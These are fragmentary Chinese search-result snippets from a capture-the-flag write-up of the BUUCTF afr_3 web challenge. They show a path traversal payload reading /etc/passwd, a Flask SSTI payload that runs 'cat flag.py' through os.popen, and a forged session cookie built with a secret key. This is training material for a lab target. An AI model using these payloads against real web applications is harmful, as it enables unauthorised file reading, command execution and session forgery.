继续本题 使用flask_session_cookie_manager3生成payload python3./flask_session_cookie_manager3.py encode-s"Drmhze6EPcv0fN_81Bj-nA"-t"{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}" -s ...
BUUCTF[第一章 web入门]afr_3 1 考点: 1.linux系统命令 2.flask之ssti模板注入 3.sisson伪造 进入靶场: 随便输入一个值,提交查询。 发现article可点击。 name参数值可以更改,利用这个name参数获取当前执行系统命令 payload:name=../../../etc/passwd 在Linux /etc/passwd文件中每个用户都有一个对应的记录行...
注意,这里使用的是python2的ssti代码 python3的ssti中的类的数量和python2不一样 python3的ssti格式(与本题无关,本题是python2的) {{''.__class__.__mro__[1].__subclasses__()}} 1. 继续本题 使用flask_session_cookie_manager3生成payload python3 ./flask_session_cookie_manager3....